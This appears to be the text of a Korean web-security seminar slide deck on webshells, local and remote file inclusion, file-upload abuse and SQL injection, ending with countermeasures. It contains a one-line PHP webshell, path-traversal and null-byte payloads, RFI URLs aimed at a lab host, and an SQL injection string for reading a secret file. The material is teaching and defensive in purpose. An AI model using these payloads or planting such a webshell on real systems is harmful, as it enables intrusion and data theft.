Web vulnerability seminar4
-
Upload
sakuya-izayoi -
Category
Technology
-
view
471 -
download
8
description
Transcript of Web vulnerability seminar4
![Page 1: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/1.jpg)
Web vulnerability seminar
Let’s exploit
![Page 2: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/2.jpg)
Contents
$ PHP + Source code auditing$ DB + SQLi$ XSS & CSRF$ Something Else$ Finish..?
![Page 3: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/3.jpg)
Something else contents
$ Fiddler – Web Proxy Tool$ Webshell$ LFI/RFI$ File up/download (with SQL i)
![Page 4: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/4.jpg)
Proxy Tool
![Page 5: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/5.jpg)
Proxy Tool lists
$ Paros$ Burpsuite$ Fiddler…
![Page 6: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/6.jpg)
Request 창
Response 창
Request/Response Trap
Packet Capture
![Page 7: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/7.jpg)
패킷생성
작성
![Page 8: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/8.jpg)
Webshell?
![Page 9: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/9.jpg)
Webshell!
![Page 10: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/10.jpg)
Webshell
$ php,jsp,asp 등 언어마다 다름$ 하지만 원리는 비슷함
![Page 11: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/11.jpg)
내용 !
system($_GET[cmd]);
![Page 12: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/12.jpg)
php..
<textarea name="CONTENT" style="width:100%; height:80%">
<?echo system($_GET[cmd]);
?></textarea>
![Page 13: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/13.jpg)
웹쉘 실행
![Page 14: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/14.jpg)
이제부터 이걸 쓸 겁니다 .
![Page 15: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/15.jpg)
Homepage
![Page 16: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/16.jpg)
과거회상
![Page 17: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/17.jpg)
![Page 18: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/18.jpg)
???.php
![Page 19: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/19.jpg)
결과
![Page 20: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/20.jpg)
경로 ?
$ include( 경로 )
경로 관련 문자열 : ., /
![Page 21: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/21.jpg)
경로 ?
$ p = zizihacker== ../FI/zizihacker==../../etc/FI/zizihacker…
C:\secret 파일을 읽으세요
![Page 22: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/22.jpg)
LFI
$ ../../../../../../../secret
$ secret.php
if(isset($_GET[p])){
$path = $_GET[p].".php";
include($path);echo "<br><br>";
}
![Page 23: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/23.jpg)
With NULL.
$ ../../../../../../../secret%00
$ secret
if(isset($_GET[p])){
$path = $_GET[p].".php";
include($path);echo "<br><br>";
}
%00.php
![Page 24: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/24.jpg)
RFI
$ 경로에 원격도 먹히지 않을까 ?
$ 그렇다면 내 서버의 파일을 실행 시키거나 올릴 수 있지 않을까 ?
![Page 25: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/25.jpg)
RFI
![Page 26: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/26.jpg)
RFI
$ 자신이 만든 php 를 올려봅시다
$ http://192.168.32.75/RFI.php?p=
![Page 27: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/27.jpg)
Exploit
$ http://192.168.32.75/RFI.php?p=http://ip/path/test.txt%00
$ http://192.168.32.75/RFI.php?p=http://ip/path/test.txt?
![Page 28: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/28.jpg)
왜 ?
![Page 29: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/29.jpg)
File upload
$ 파일 업로드> 글쓰기 및 파일 업로드 요청> FTP 에 저장 혹은 DB 와 연동
![Page 30: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/30.jpg)
File upload
![Page 31: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/31.jpg)
2 가지 취약점이 존재 .
$ 파일이름을 그대로 씀$ SQL injection 취약점이 존재
![Page 32: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/32.jpg)
웹쉘을 올려봅시다 .
![Page 33: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/33.jpg)
경로를 어떻게 알아야 하나요 ?
힌트 : ………………………………..
![Page 34: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/34.jpg)
서버설정도 덮어 쓸 수 있음 .
$ .htaccess$ php.ini$ httpd.conf...
![Page 35: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/35.jpg)
htaccess
디렉토리 별로 설정을 변경 할 수 있음
magic_quote_gpcengineLFI RFI 관련기타 여러가지
![Page 36: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/36.jpg)
과거회상
![Page 37: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/37.jpg)
SQl injection
$ ‘1,’wer’,’2’),(‘2
+ 센스 ?
C:\secret 파일을 읽어봅시다 .
![Page 38: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/38.jpg)
SQL
$ INSERT INTO a,b,c values(‘',0x433a2f736563726574,1234)#’,path,ip);
![Page 39: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/39.jpg)
file Download
$ SQL 인젝션을 통해 db 에 값을 넣고$ file download 기능을 통해 받는다 .
![Page 40: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/40.jpg)
대처방안 LFI
$ 경로 관련 문자열 필터링> 일반적인 파일 이름엔 / 가 들어가지 않음 !
$ 페이지를 db 에 따로 저장> 관리가 귀찮음 ..
$ NULL 문자 방지를 위해 magic_quote on> magic_quote_gpc 를 켜면 %00=> \0
![Page 41: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/41.jpg)
대처방안 RFI
$ 기본옵션에서 막혀 있음 ..> allow_url_fopen = off> allow_url_include = off
$ 만약 써야 한다면 신뢰할 수 있는 url 이외엔 drop
![Page 42: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/42.jpg)
대처방안 File upload
$ FTP 를 사용할 시 anon 계정의 w 권한 금지> 계정 사용 자체를 막는 것도 좋은 방법
$ db 와 연동 시 sql 취약점을 잘 판단할 것 .> magic_quote_gpc 만 켜도 해결되긴 함 ..
$ 파일이름을 랜덤하게 지정할 것 .> 경로 또한 마찬가지
![Page 43: Web vulnerability seminar4](https://reader035.fdocuments.in/reader035/viewer/2022062514/5588f826d8b42afe678b4577/html5/thumbnails/43.jpg)
추가 . File download
$ 요청과 권한을 확인 할 것> 비 로그인 및 불충분한 권한인지 확인
$ db 에서 가져온 값을 그대로 신용하지 말고 체크할 것
$ download 받을 시 인자 값에서 injection이 발생 할 수도 있음 !